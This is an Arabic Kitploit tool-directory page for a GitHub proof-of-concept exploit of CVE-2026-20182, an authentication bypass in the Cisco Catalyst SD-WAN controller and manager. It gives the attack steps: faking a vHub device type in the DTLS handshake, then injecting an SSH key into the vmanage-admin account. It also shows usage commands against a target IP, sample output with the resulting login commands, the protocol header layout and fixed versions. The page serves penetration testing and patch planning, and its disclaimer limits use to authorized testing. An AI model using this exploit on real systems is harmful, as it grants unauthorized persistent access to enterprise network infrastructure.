Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager تجاوز المصادقة (CVSS 10.0) | Kitploit
أدوات/GitHubGitHub/portbuster1337/cve-2026-20182
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقأمن السحابةالمصادقةالفريق الأحمر
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager تجاوز المصادقة (CVSS 10.0)

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2026-20182 — تجاوز المصادقة في وحدة تحكم/مدير Cisco Catalyst SD-WAN

استغلال إثبات مفهوم لـ CVE-2026-20182، وهو تجاوز مصادقة حرج (CVSS 10.0) في خدمة vdaemon DTLS (UDP/12346) على وحدة تحكم (vSmart) ومدير (vManage) Cisco Catalyst SD-WAN.

الإفصاح: 14 مايو 2026 بواسطة Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: أضيف في 14 مايو 2026 (توجيه الطوارئ 26-03)
CVSS: 10.0 — CWE-287: مصادقة غير صحيحة

الثغرة

تستخدم خدمة vdaemon مصافحة DTLS متعددة المراحل لمصادقة أقران مستوى التحكم. تقوم وظيفة vbond_proc_challenge_ack() بتنفيذ التحقق من الشهادة الخاص بنوع الجهاز — لكن نوع الجهاز 2 (vHub) لا يحتوي على مسار تحقق. إرسال CHALLENGE_ACK مع device_type=2 يتسبب في تجاوز الوظيفة لكل الشروط الشرطية وتعيين peer->authenticated = 1 بدون شروط.

لا حاجة لبيانات اعتماد صالحة، أو شهادة موقعة من CA، أو معرفة بنشر SD-WAN.

ما يفعله الاستغلال

  1. إنشاء اتصال DTLS 1.2 بخدمة vdaemon الهدف (UDP/12346)
  2. استقبال رسالة CHALLENGE (msg_type=8)
  3. إرسال CHALLENGE_ACK مدعياً أنه vHub (device_type=2) → يتم وضع علامة مصادقة على النظير
  4. إرسال HELLO (msg_type=5) → ينتقل النظير إلى حالة UP
  5. حقن مفتاح SSH عام في /home/vmanage-admin/.ssh/authorized_keys عبر MSG_VMANAGE_TO_PEER (msg_type=14)
  6. منح وصول NETCONF (SSH TCP/830) أو وصول SSH (TCP/22) كمستخدم vmanage-admin

الاستخدام

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

الخيارات

Argumentالوصف
,

أمثلة

root@kitploit:~
# إنشاء زوج مفاتيح جديد واستغلال
python3 cve-2026-20182.py -t 192.168.1.100

# استخدام مفتاح عام موجود
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# استغلال والتحقق عبر NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

المخرجات

root@kitploit:~
[*] استهداف 192.168.1.100:12346 (vdaemon DTLS)
[+] اكتملت مصافحة DTLS (تم استقبال msg_type=8، 1027 بايت)
[*] إرسال CHALLENGE_ACK مع device_type=2 (vHub) ...
[+] peer->authenticated = 1 (تم تجاوز المصادقة!)
[*] إرسال HELLO ...
[+] النظير في حالة UP (تم تجاوز مصافحة الاقتران بنجاح)
[*] حقن مفتاح SSH العام ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

الإصدارات المتأثرة

المراجع البحثية

  • Rapid7 (الإفصاح الأصلي): CVE-2026-20182: تجاوز مصادقة حرج في وحدة تحكم Cisco Catalyst SD-WAN — تحليل تقني كامل، كود مفكك، وتفاصيل البروتوكول بواسطة Stephen Fewer & Jonah Burgess
  • Cisco Security Advisory: cisco-sa-sdwan-rpa2-v69WY2SW — استشارة البائع مع الإصدارات الثابتة
  • CISA KEV: CVE-2026-20182 — توجيه الطوارئ 26-03 (المعالجة بحلول 17 مايو 2026)
  • NVD: CVE-2026-20182 — إدخال قاعدة بيانات الثغرات الوطنية
  • Rapid7 Metasploit Module: cisco_sdwan_vhub_auth_bypass — وحدة مساعدة في إطار Metasploit
  • BleepingComputer: Cisco تحذر من ثغرة SD-WAN حرجة جديدة تم استغلالها في هجمات يوم الصفر
  • Tenable: أسئلة شائعة حول الاستغلال المستمر لثغرات Cisco SD-WAN
  • Cisco Talos: مُهدِّد UAT-8616 نُسب إلى استغلال هذه الثغرة في البرية

التفاصيل التقنية

رأس بروتوكول vdaemon هو 12 بايت:

أنواع الأجهزة: 1=vEdge، 2=vHub، 3=vSmart، 4=vBond، 5=vManage

المتطلبات

  • بايثون 3.7+
  • واجهة سطر الأوامر openssl (لنقل DTLS)
  • مكتبة cryptography (pip install cryptography)

إخلاء المسؤولية

يُقصد من هذا الاستغلال استخدامه فقط في عمليات الفريق الأحمر المصرح بها، واختبار الاختراق، والبحث الأمني على الأنظمة التي لديك إذن كتابي صريح لها. الاستخدام غير المصرح به غير قانوني.

تنزيل الأداة
-t
--target
عنوان IP الهدف أو اسم المضيف
--portمنفذ vdaemon UDP (الافتراضي: 12346)
--key-fileمسار لمفتاح SSH عام موجود لحقنه (اختياري)
--netconfالتحقق من الاستغلال بالاتصال بـ NETCONF عبر SSH
الإصدارالإصدار الثابت
< 20.9الانتقال إلى إصدار مدعوم
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1
الإزاحةالحجمالحقلملاحظات
01msg_typeالـ nibble المنخفض = النوع، الـ nibble المرتفع = الإصدار
11device_infoالـ nibble المرتفع = device_type، الـ nibble المنخفض = flags
21flagsالقيمة القياسية 0xA0
31paddingدائماً 0x00
4-74domain_iduint32 بنظام big-endian
8-114site_iduint32 بنظام big-endian